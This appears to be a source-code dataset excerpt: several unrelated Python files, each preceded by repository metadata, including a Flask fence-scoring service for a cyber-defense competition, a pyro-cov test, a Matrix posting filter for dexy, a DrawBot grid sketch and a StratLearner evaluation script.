| 30.326531 | 78 | 0.694482 | 410 | 2,972 | 4.834146 | 0.356098 | 0.017659 | 0.030272 | 0.015136 | 0.113017 | 0.029263 | 0 | 0 | 0 | 0 | 0 | 0.01024 | 0.145693 | 2,972 | 97 | 79 | 30.639175 | 0.770382 | 0.354307 | 0 | 0 | 0 | 0 | 0.05248 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.2 | 0 | 0.2 | 0.044444 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e75b23de02a67ea7c8d05abe2bf178f7d08eb2d7 | 1,857 | py | Python | triassic_scoring.py | SouthwestCCDC/2019-pcc | a2a38cfd0eb714fc9b2c0e69484171306eca67e0 | [
"Unlicense"
] | 1 | 2022-01-14T18:04:20.000Z | 2022-01-14T18:04:20.000Z | triassic_scoring.py | wrharding/triassic_shell | 2d13f8299c01a050d230034d2d37e0e3af8e1a02 | [
"Unlicense"
] | null | null | null | triassic_scoring.py | wrharding/triassic_shell | 2d13f8299c01a050d230034d2d37e0e3af8e1a02 | [
"Unlicense"
] | 1 | 2021-01-22T23:03:29.000Z | 2021-01-22T23:03:29.000Z | import sys
import logging
import socket
import argparse
import json
import os
import data_model
from flask import Flask
app = Flask(__name__)
app.secret_key = 'NpaguVKgv<;f;i(:T>3tn~dsOue5Vy)'
@app.route('/degrade/<int:index>/')
def degrade_segment(index):
if index >= 97 or index < 0:
return 'bad'
else:
data_model.load_from_disk()
node = list(data_model.fence_segments.values())[index]
node.state -= 0.067
data_model.save_to_disk()
return 'done'
@app.route('/fence/<string:dinosaur>/<int:percent>/')
def exhibit_contained(dinosaur,percent):
if dinosaur not in ['velociraptor', 'tyrannosaurus', 'guaibasaurus', 'triceratops', 'all']:
return 'error'
all_exhibits = set()
fence_sections = {}
data_model.load_from_disk()
for id,node in data_model.fence_segments.items():
all_exhibits.add(node.dinosaur)
fence_sections[id] = node
number_up = 0
total_number = 0
for section in fence_sections.values():
if dinosaur == 'all' or section.dinosaur == dinosaur:
total_number += 1
if section.state >= 0.3:
number_up += 1
percent_up = int(100 * (float(number_up)/float(total_number)))
if percent_up >= percent:
return 'up'
else:
return 'down'
def main():
parser = argparse.ArgumentParser(prog='triassic_scoring.py')
parser.add_argument('-f', '--file', help="Path to the ZODB persistence file to use.")
parser.add_argument('-a', '--address', default='0.0.0.0', dest='host')
parser.add_argument('-p', '--port', default='5000', dest='port')
args = parser.parse_args()
# Initialize the database, if needed.
data_model.init_db(args.file if args.file else None)
app.run(host=args.host, port=args.port)
if __name__ == "__main__":
main()
| 26.913043 | 95 | 0.645665 | 249 | 1,857 | 4.618474 | 0.429719 | 0.054783 | 0.044348 | 0.029565 | 0.036522 | 0 | 0 | 0 | 0 | 0 | 0 | 0.017869 | 0.216478 | 1,857 | 68 | 96 | 27.308824 | 0.772509 | 0.018848 | 0 | 0.076923 | 0 | 0 | 0.152198 | 0.05 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057692 | false | 0 | 0.153846 | 0 | 0.307692 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e765fb3f3635f387b5b8188b7acfcdc41c6bffec | 894 | py | Python | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 22 | 2021-09-14T04:33:11.000Z | 2022-02-01T21:33:05.000Z | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 7 | 2021-11-02T13:48:35.000Z | 2022-03-23T18:08:35.000Z | test/test_substitution.py | corneliusroemer/pyro-cov | 54e89d128293f9ff9e995c442f72fa73f5f99b76 | [
"Apache-2.0"
] | 6 | 2021-09-18T01:06:51.000Z | 2022-01-10T02:22:06.000Z | # Copyright Contributors to the Pyro-Cov project.
# SPDX-License-Identifier: Apache-2.0
import pyro.poutine as poutine
import pytest
import torch
from pyro.infer.autoguide import AutoDelta
from pyrocov.substitution import GeneralizedTimeReversible, JukesCantor69
@pytest.mark.parametrize("Model", [JukesCantor69, GeneralizedTimeReversible])
def test_matrix_exp(Model):
model = Model()
guide = AutoDelta(model)
guide()
trace = poutine.trace(guide).get_trace()
t = torch.randn(10).exp()
with poutine.replay(trace=trace):
m = model()
assert torch.allclose(model(), m)
exp_mt = (m * t[:, None, None]).matrix_exp()
actual = model.matrix_exp(t)
assert torch.allclose(actual, exp_mt, atol=1e-6)
actual = model.log_matrix_exp(t)
log_exp_mt = exp_mt.log()
assert torch.allclose(actual, log_exp_mt, atol=1e-6)
| 29.8 | 77 | 0.694631 | 118 | 894 | 5.144068 | 0.432203 | 0.041186 | 0.093904 | 0.082372 | 0.039539 | 0 | 0 | 0 | 0 | 0 | 0 | 0.016598 | 0.191275 | 894 | 29 | 78 | 30.827586 | 0.82296 | 0.092841 | 0 | 0 | 0 | 0 | 0.006188 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.047619 | false | 0 | 0.238095 | 0 | 0.285714 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7666c41475df3a201f3e9500fe80142589cab4b | 438 | py | Python | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2020-11-18T16:39:11.000Z | 2020-11-18T16:39:11.000Z | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2019-04-08T12:10:07.000Z | 2019-04-08T12:10:07.000Z | angr/engines/vex/expressions/unsupported.py | aeflores/angr | ac85a3f168375ed0ee20551b1b716c1bff4ac02b | [
"BSD-2-Clause"
] | 1 | 2020-11-18T16:39:13.000Z | 2020-11-18T16:39:13.000Z | import logging
l = logging.getLogger(name=__name__)
def SimIRExpr_Unsupported(_engine, state, expr):
l.error("Unsupported IRExpr %s. Please implement.", type(expr).__name__)
size = expr.result_size(state.scratch.tyenv)
result = state.solver.Unconstrained(type(expr).__name__, size)
state.history.add_event('resilience', resilience_type='irexpr', expr=type(expr).__name__, message='unsupported irexpr')
return result
| 39.818182 | 123 | 0.755708 | 55 | 438 | 5.636364 | 0.527273 | 0.077419 | 0.116129 | 0.103226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.116438 | 438 | 10 | 124 | 43.8 | 0.801034 | 0 | 0 | 0 | 0 | 0 | 0.16895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.125 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76781753c0e4a869e70caddd34d8e8a1557bef1 | 5,090 | py | Python | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost_whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | null | null | null | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost_whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | 2 | 2020-11-13T13:46:11.000Z | 2020-11-20T08:36:55.000Z | bifrost_whats_my_species/datadump.py | ssi-dk/bifrost-whats_my_species | fe59e8cf096b8622747278959d53a95c80bed9ad | [
"MIT"
] | null | null | null | from bifrostlib import common
from bifrostlib.datahandling import Sample
from bifrostlib.datahandling import SampleComponentReference
from bifrostlib.datahandling import SampleComponent
from bifrostlib.datahandling import Category
from typing import Dict
import os
def extract_bracken_txt(species_detection: Category, results: Dict, component_name: str) -> None:
file_name = "bracken.txt"
file_key = common.json_key_cleaner(file_name)
file_path = os.path.join(component_name, file_name)
results[file_key] = {}
with open(file_path, "r") as fh:
buffer = fh.readlines()
number_of_entries = min(len(buffer) - 1, 2)
if number_of_entries > 0: # skip first line as it's header
for i in range(1, 1 + number_of_entries): # skip first line as it's header
results[file_key]["species_" + str(i) + "_name"] = buffer[i].split("\t")[0]
results[file_key]["species_" + str(i) + "_kraken_assigned_reads"] = buffer[i].split("\t")[3]
results[file_key]["species_" + str(i) + "_added_reads"] = buffer[i].split("\t")[4]
results[file_key]["species_" + str(i) + "_count"] = int(buffer[i].split("\t")[5].strip())
def extract_kraken_report_bracken_txt(species_detection: Category, results: Dict, component_name: str) -> None:
file_name = "kraken_report_bracken.txt"
file_key = common.json_key_cleaner(file_name)
file_path = os.path.join(component_name, file_name)
results[file_key] = {}
with open(file_path, "r") as fh:
buffer = fh.readlines()
if len(buffer) > 2:
results[file_key]["unclassified_count"] = int(buffer[0].split("\t")[1])
results[file_key]["root"] = int(buffer[1].split("\t")[1])
def species_math(species_detection: Category, results: Dict, component_name: str) -> None:
kraken_report_bracken_key = common.json_key_cleaner("kraken_report_bracken.txt")
bracken_key = common.json_key_cleaner("bracken.txt")
if ("status" not in results[kraken_report_bracken_key] and
"status" not in results[bracken_key] and
"species_1_count" in results[bracken_key] and
"species_2_count" in results[bracken_key]):
species_detection["summary"]["percent_unclassified"] = results[kraken_report_bracken_key]["unclassified_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["percent_classified_species_1"] = results[bracken_key]["species_1_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["name_classified_species_1"] = results[bracken_key]["species_1_name"]
species_detection["summary"]["percent_classified_species_2"] = results[bracken_key]["species_2_count"] / (results[kraken_report_bracken_key]["unclassified_count"] + results[kraken_report_bracken_key]["root"])
species_detection["summary"]["name_classified_species_2"] = results[bracken_key]["species_2_name"]
species_detection["summary"]["detected_species"] = species_detection["summary"]["name_classified_species_1"]
def set_sample_species(species_detection: Category, sample: Sample) -> None:
sample_info = sample.get_category("sample_info")
if sample_info is not None and sample_info.get("summary", {}).get("provided_species", None) is not None:
species_detection["summary"]["species"] = sample_info["summary"]["provided_species"]
else:
species_detection["summary"]["species"] = species_detection["summary"].get("detected_species", None)
def datadump(samplecomponent_ref_json: Dict):
samplecomponent_ref = SampleComponentReference(value=samplecomponent_ref_json)
samplecomponent = SampleComponent.load(samplecomponent_ref)
sample = Sample.load(samplecomponent.sample)
species_detection = samplecomponent.get_category("species_detection")
if species_detection is None:
species_detection = Category(value={
"name": "species_detection",
"component": {"id": samplecomponent["component"]["_id"], "name": samplecomponent["component"]["name"]},
"summary": {},
"report": {}
}
)
extract_bracken_txt(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
extract_kraken_report_bracken_txt(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
species_math(species_detection, samplecomponent["results"], samplecomponent["component"]["name"])
set_sample_species(species_detection, sample)
samplecomponent.set_category(species_detection)
sample.set_category(species_detection)
samplecomponent.save_files()
common.set_status_and_save(sample, samplecomponent, "Success")
with open(os.path.join(samplecomponent["component"]["name"], "datadump_complete"), "w+") as fh:
fh.write("done")
datadump(
snakemake.params.samplecomponent_ref_json,
)
| 57.840909 | 226 | 0.711591 | 610 | 5,090 | 5.622951 | 0.160656 | 0.116618 | 0.072012 | 0.057726 | 0.522157 | 0.472012 | 0.397668 | 0.340233 | 0.3 | 0.23965 | 0 | 0.005834 | 0.158153 | 5,090 | 87 | 227 | 58.505747 | 0.794632 | 0.011984 | 0 | 0.131579 | 0 | 0 | 0.179591 | 0.041101 | 0 | 0 | 0 | 0 | 0 | 1 | 0.065789 | false | 0 | 0.092105 | 0 | 0.157895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76785635d525e1ea987b9fb10498fdb21db674e | 627 | py | Python | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | ex6-8.py | yiyidhuang/PythonCrashCrouse2nd | 3512f9ab8fcf32c6145604a37e2a62feddf174d1 | [
"MIT"
] | null | null | null | cristiano = {
'type': 'dog',
'owner': 'wei',
}
rose = {
'type': 'cat',
'owner': 'yan',
}
cloud = {
'type': 'pig',
'owner': 'luo',
}
pets = [cristiano, rose, cloud]
for pet in pets:
if pet == cristiano:
print('\nCristiano: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
elif pet == rose:
print('\nRose: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
elif pet == cloud:
print('\nCould: '
+ '\n\ttype: ' + pet['type']
+ '\n\towner: ' + pet['owner'])
| 20.225806 | 45 | 0.405104 | 62 | 627 | 4.096774 | 0.387097 | 0.070866 | 0.106299 | 0.153543 | 0.385827 | 0.385827 | 0.385827 | 0.385827 | 0.275591 | 0.275591 | 0 | 0 | 0.365231 | 627 | 30 | 46 | 20.9 | 0.638191 | 0 | 0 | 0.230769 | 0 | 0 | 0.263158 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.115385 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e769251e473b5f4b32970f5dbac6d06da53753e2 | 4,766 | py | Python | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 136 | 2015-01-06T15:04:47.000Z | 2021-12-21T22:52:41.000Z | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 13 | 2015-01-26T14:06:58.000Z | 2020-03-27T21:16:10.000Z | dexy/filters/matrix.py | dexy/dexy | 323c1806e51f75435e11d2265703e68f46c8aef3 | [
"MIT"
] | 34 | 2015-01-02T16:24:53.000Z | 2021-11-27T05:38:30.000Z | from bs4 import BeautifulSoup
from dexy.filters.api import ApiFilter
import asyncio
import json
import mimetypes
import markdown
try:
from nio import AsyncClient
AVAILABLE = True
except ImportError:
AVAILABLE = False
async def main_nio(homeserver, user, password, room_id, ext, mimetype, data_provider, content, log_fn):
client = AsyncClient(homeserver, user)
await client.login(password)
upload_response, decrypt_info = None, None
if data_provider:
upload_response, decrypt_info = await client.upload(
data_provider,
mimetype
)
content['url'] = upload_response.content_uri
log_fn("uploading message to room %s: %s" % (room_id, str(content)))
response = await client.room_send(
room_id=room_id,
message_type="m.room.message",
content=content
)
await client.close()
return {
"event_id" : response.event_id,
"room_id" : response.room_id
}
class MatrixFilter(ApiFilter):
"""
Filter for posting text, files, or images to a matrix room. Uses matrix-nio
Create a .dexyapis JSON file in your HOME dir with format:
{
"matrix": {
"homeserver" : "https://example.org",
"username" : "@example:example.org",
"password" : "sekret1!"
}
}
"""
aliases = ['matrix']
_settings = {
'room-id' : ("The room id (NOT the room name!) to post to.", "!yMPKbtdRlqJWpwCcvg:matrix.org"),
'api-key-name' : 'matrix',
'input-extensions' : ['.*'],
'output-extensions' : ['.json']
}
def is_active(self):
return AVAILABLE
def data_provider(self, a, b):
# FIXME currently ignoring params a, b
return self.input_data.storage.data_file()
def process(self):
if self.input_data.ext in ('.html'):
text = str(self.input_data)
soup = BeautifulSoup(text, 'html.parser')
# https://matrix.org/docs/spec/client_server/r0.6.0#m-room-message-msgtypes
# "should" do this in bs4 but this works
# FIXME? bg-color is ignored in riot
modified_html = text.replace("style=\"color: ", "data-mx-color=\"").replace("style=\"background: ", "data-mx-bg-color=\"")
content = {
'msgtype' : 'm.text',
'format' : 'org.matrix.custom.html',
'body' : soup.get_text(),
'formatted_body' : modified_html
}
### "matrix-markdown"
elif self.input_data.ext in ('.md'):
text = str(self.input_data)
html = markdown.markdown(text, extensions=['fenced_code'])
soup = BeautifulSoup(html, 'html.parser')
for code_block in soup.find_all("code"):
code_block['class'] = "language-%s" % code_block['class'][0]
code_block.string = code_block.string.lstrip()
content = {
'msgtype' : 'm.text',
'format' : 'org.matrix.custom.html',
'body' : soup.get_text(),
'formatted_body' : str(soup)
}
### @end
elif self.input_data.ext in ('.txt'):
text = str(self.input_data)
content = {
'msgtype' : "m.text",
'body' : text
}
elif self.input_data.ext in ('.png', '.jpeg', '.jpg', '.bmp'):
if hasattr(self.doc, 'created_by_doc'):
description = "image %s generated by script %s" % (self.input_data.name, self.doc.created_by_doc.name)
else:
description = "automatically generated image %s" % self.input_data.name
content = {
'msgtype' : 'm.image',
'body' : description
}
else:
content = {
'msgtype' : 'm.file',
'filename' : self.input_data.name,
'body' : self.input_data.name
}
loop = asyncio.get_event_loop()
response = loop.run_until_complete(main_nio(
homeserver=self.read_param('homeserver'),
user=self.read_param('username'),
password=self.read_param('password'),
room_id=self.setting('room-id'),
ext=self.input_data.ext,
mimetype=mimetypes.guess_type(self.input_data.name)[0],
data_provider=self.data_provider,
content=content,
log_fn=self.log_debug
))
self.output_data.set_data(json.dumps(response))
| 32.868966 | 134 | 0.536299 | 511 | 4,766 | 4.857143 | 0.334638 | 0.050766 | 0.073328 | 0.032232 | 0.14585 | 0.084609 | 0.058018 | 0.058018 | 0.058018 | 0.058018 | 0 | 0.002553 | 0.342426 | 4,766 | 144 | 135 | 33.097222 | 0.789407 | 0.103651 | 0 | 0.156863 | 0 | 0 | 0.142891 | 0.017565 | 0 | 0 | 0 | 0.006944 | 0 | 1 | 0.029412 | false | 0.029412 | 0.078431 | 0.019608 | 0.166667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76a39929d3dba1cca55b2346b00be6b52fb4b66 | 880 | py | Python | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | vera molnar/random_grids.py | jkocontreras/drawbotscripts | 6688e65e057f25901ac1adb93c3108ab889de49f | [
"MIT"
] | null | null | null | import random
# ----------------------
# settings
pw = ph = 500
cell_a = 10 # amount of cells
sbdvs = 3 # subdivisions
gap = pw /(cell_a * sbdvs + cell_a + 1)
cell_s = sbdvs * gap
points = [(x * gap, y * gap) for x in range(sbdvs+1) for y in range(sbdvs+1) ]
# ----------------------
# function(s)
def a_grid_cell(pos, s, points, amount = len(points)):
random.shuffle(points)
points = random.sample( points, amount )
with savedState():
translate(x * (cell_s + gap), y * (cell_s + gap))
polygon(*points, close=False)
# ----------------------
# drawing
newPage(pw, ph)
rect(0, 0, pw, ph)
translate(gap, gap)
fill(None)
strokeWidth(1)
stroke(1)
lineCap('round')
lineJoin('round')
for x in range( cell_a ):
for y in range( cell_a ):
a_grid_cell((x * cell_s, y * cell_s), cell_s, points, y + 3)
# saveImage('random_grids.jpg') | 19.555556 | 79 | 0.575 | 131 | 880 | 3.740458 | 0.389313 | 0.061224 | 0.02449 | 0.044898 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.020202 | 0.2125 | 880 | 45 | 80 | 19.555556 | 0.686869 | 0.181818 | 0 | 0 | 0 | 0 | 0.014065 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.041667 | false | 0 | 0.041667 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76c666397b985650186328fae42e70cb9a10b72 | 1,835 | py | Python | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | 3 | 2018-07-18T14:41:00.000Z | 2020-10-30T13:26:26.000Z | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | 1 | 2018-07-19T08:23:09.000Z | 2018-07-19T08:23:09.000Z | distiller/core/Distiller.py | darkclouder/distiller | a8efbfd807d781b90daba6023e3f966a52836b42 | [
"BSD-2-Clause"
] | null | null | null | import os
from distiller.core.impl.HttpServer import HttpServer
from distiller.core.impl.CoreHandler import CoreHandler
class Distiller:
def __init__(self, env):
self.env = env
self.logger = self.env.logger.claim("Core")
self.shutdown = False
self.srv = HttpServer(CoreHandler(), self.env)
self.pidfile = self.env.config.get("distiller.pidfile", path=True)
def is_running(self):
# Check if pid file already exists
# and if the pid is still running
if os.path.isfile(self.pidfile):
with open(self.pidfile, "r") as f:
try:
pid = int(f.readline())
except ValueError:
self.logger.warning("Corrupt pid file")
os.remove(self.pidfile)
return False
# Check if process still running
try:
os.kill(pid, 0)
except OSError:
self.logger.notice("Daemon not running, but pid file exists")
os.remove(self.pidfile)
return False
else:
return True
return False
def run(self):
self.logger.notice("Daemon start-up")
# Write pid to pidfile
pid = str(os.getpid())
with open(self.pidfile, "w") as f:
f.write(pid)
# Start watchdog (non-blocking)
self.env.watchdog.run()
# Start web server (blocking)
self.srv.run()
def stop(self):
self.logger.notice("Daemon shutdown initiated")
# Stop web server
self.srv.stop()
# Stop watchdog (non-blocking)
self.env.watchdog.stop()
os.remove(self.pidfile)
self.logger.notice("Daemon shutdown done")
| 27.38806 | 81 | 0.541144 | 208 | 1,835 | 4.75 | 0.355769 | 0.049595 | 0.064777 | 0.089069 | 0.220648 | 0.129555 | 0 | 0 | 0 | 0 | 0 | 0.000856 | 0.363488 | 1,835 | 66 | 82 | 27.80303 | 0.845034 | 0.119346 | 0 | 0.195122 | 0 | 0 | 0.085874 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.073171 | 0 | 0.292683 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e76ef4520136e84bfa60de421094e1c1499594a2 | 5,854 | py | Python | StratLearner/run_PreTrain.py | cdslabamotong/stratLearner | 58f278d438eed92683a7daac2605ec39abd18c94 | [
"MIT"
] | 7 | 2020-12-02T06:58:30.000Z | 2022-03-04T01:21:59.000Z | StratLearner/run_PreTrain.py | dm-ytlds/stratLearner | 3ad880a5ca0472a3a5823fa27db7dd2bc8ba0f33 | [
"MIT"
] | null | null | null | StratLearner/run_PreTrain.py | dm-ytlds/stratLearner | 3ad880a5ca0472a3a5823fa27db7dd2bc8ba0f33 | [
"MIT"
] | 1 | 2020-12-02T06:58:32.000Z | 2020-12-02T06:58:32.000Z | """
==============================
StratLearner Training
==============================
"""
import numpy as np
from one_slack_ssvm import OneSlackSSVM
from stratLearner import (StratLearn, Utils, InputInstance)
import multiprocessing
import argparse
import os
import sys
from datetime import datetime
class Object(object):
pass
parser = argparse.ArgumentParser()
parser.add_argument(
'--path', default="pre_train/preTrain_power768_uniform_structure0-01_100", help='the file of a pre_train model')
parser.add_argument(
'--testNum', type=int, default=270, help='number of testing data')
parser.add_argument(
'--thread', type=int, default=3, help='number of threads')
parser.add_argument(
'--output', action="store_true", help='if output prediction')
args = parser.parse_args()
utils= Utils()
file = open(args.path, 'r')
dataname= file.readline().split()[0]
vNum=int(file.readline().split()[0])
featureGenMethod=file.readline().split()[0]
featureNum=int(file.readline().split()[0])
indexes=[]
w=[]
line=file.readline()
while line:
indexes.append(int(line.split()[0]))
w.append(float(line.split()[1]))
line=file.readline()
trainNum =0
testNum =args.testNum
pairMax=2500
thread = args.thread
verbose=3
#parameter used in SVM
C = 0.01
tol=0.001
if featureGenMethod == "uniform_structure1-0":
maxFeatureNum=1
max_iter=0
else:
if featureGenMethod == "WC_Weibull_structure":
maxFeatureNum=800
max_iter = 0
else:
maxFeatureNum=2000
max_iter = 0
#define the one-hop loss
balance_para=1000;
loss_type = Object()
loss_type.name="area"
loss_type.weight=1
LAI_method = "fastLazy"
effectAreaNum = 1
#simulation times, small number for testing
infTimes = 1080
#get data
path = os.getcwd()
data_path=os.path.abspath(os.path.join(path, os.pardir))+"/data"
pair_path = "{}/{}/{}_pair_{}".format(data_path,dataname,dataname,pairMax)
graphPath = "{}/{}/{}_diffusionModel".format(data_path,dataname,dataname)
featurePath = "{}/{}/feature/{}_{}/".format(data_path,dataname,featureGenMethod,maxFeatureNum)
X_train, Y_train, _, _, X_test, Y_test, _, _ = utils.getDataTrainTestRandom(pair_path ,trainNum,testNum, pairMax)
print("data fetched")
instance = InputInstance(graphPath, featurePath, featureNum, vNum, effectAreaNum,
balance_para, loss_type, featureRandom = True, maxFeatureNum = maxFeatureNum,
thread = thread, LAI_method=LAI_method, indexes=indexes)
#**************************OneSlackSSVM
model = StratLearn()
model.initialize(X_train, Y_train, instance)
one_slack_svm = OneSlackSSVM(model, verbose=verbose, C=C, tol=tol, n_jobs=thread,
max_iter = max_iter)
#one_slack_svm.fit(X_train, Y_train, initialize = False)
one_slack_svm.w=w
print("Prediction Started")
Y_pred = one_slack_svm.predict(X_test, featureNum)
print("Testing Started")
block_size =int (testNum/thread);
p = multiprocessing.Pool(thread)
influence_Xs = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes) for i in range(thread)),1)
p.close()
p.join()
p = multiprocessing.Pool(thread)
influence_Ys = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes, Y_test[i*block_size:(i+1)*block_size]) for i in range(thread)),1)
p.close()
p.join()
p = multiprocessing.Pool(thread)
influence_Y_preds = p.starmap(instance.testInfluence_0_block, ((X_test[i*block_size:(i+1)*block_size], infTimes, Y_pred[i*block_size:(i+1)*block_size]) for i in range(thread)),1)
p.close()
p.join()
influence_X=[]
influence_Y=[]
influence_Y_pred=[]
for i in range(thread):
influence_X.extend(influence_Xs[i])
influence_Y.extend(influence_Ys[i])
influence_Y_pred.extend(influence_Y_preds[i])
reduce_percent_opt=[]
reduce_percent_pre = []
com_to_opt = []
error_abs = []
error_ratio = []
for influence_x, influence_y, influence_y_pred in zip(influence_X, influence_Y, influence_Y_pred):
#print("{} {} {} {} {}".format(influence_x,influence_y,influence_y_pred, influence_x_read, influence_y_read))
reduce_percent_opt.append((influence_x-influence_y)/influence_x)
reduce_percent_pre.append( (influence_x-influence_y_pred)/influence_x)
com_to_opt.append((influence_x-influence_y_pred)/(influence_x-influence_y+0.01))
error_abs.append((influence_y_pred-influence_y))
error_ratio.append((influence_y_pred-influence_y)/influence_y)
if args.output:
now = datetime.now()
with open(now.strftime("%d-%m-%Y %H:%M:%S"), 'a') as the_file:
for x_test, y_test, y_pred in zip(X_test,Y_test,Y_pred):
for target in [x_test, y_test, y_pred]:
line='';
for a in target:
line += a
line += ' '
line += '\n'
the_file.write(line)
the_file.write('\n')
print(dataname)
print('StratLearner')
print("error_abs: {} +- {}".format(np.mean(np.array(error_abs)), np.std(np.array(error_abs))))
print("error_ratio: {} +- {}".format(np.mean(np.array(error_ratio)), np.std(np.array(error_ratio))))
print("reduce_percent_opt: {} +- {}".format(np.mean(np.array(reduce_percent_opt)), np.std(np.array(reduce_percent_opt))))
print("reduce_percent_pre: {} +- {}".format(np.mean(np.array(reduce_percent_pre)), np.std(np.array(reduce_percent_pre))))
print("com_to_opt: {} +- {}".format(np.mean(np.array(com_to_opt)), np.std(np.array(com_to_opt))))
#
print("featureNum:{}, featureGenMethod: {}, c:{} balance_para: {}".format(featureNum, featureGenMethod, C,balance_para))
print("trainNum:{}, testNum:{}, infTimes:{} ".format(trainNum, testNum, infTimes))
print("loss_type:{}, LAI_method:{}, ".format(loss_type.name, LAI_method))
print("===============================================================")
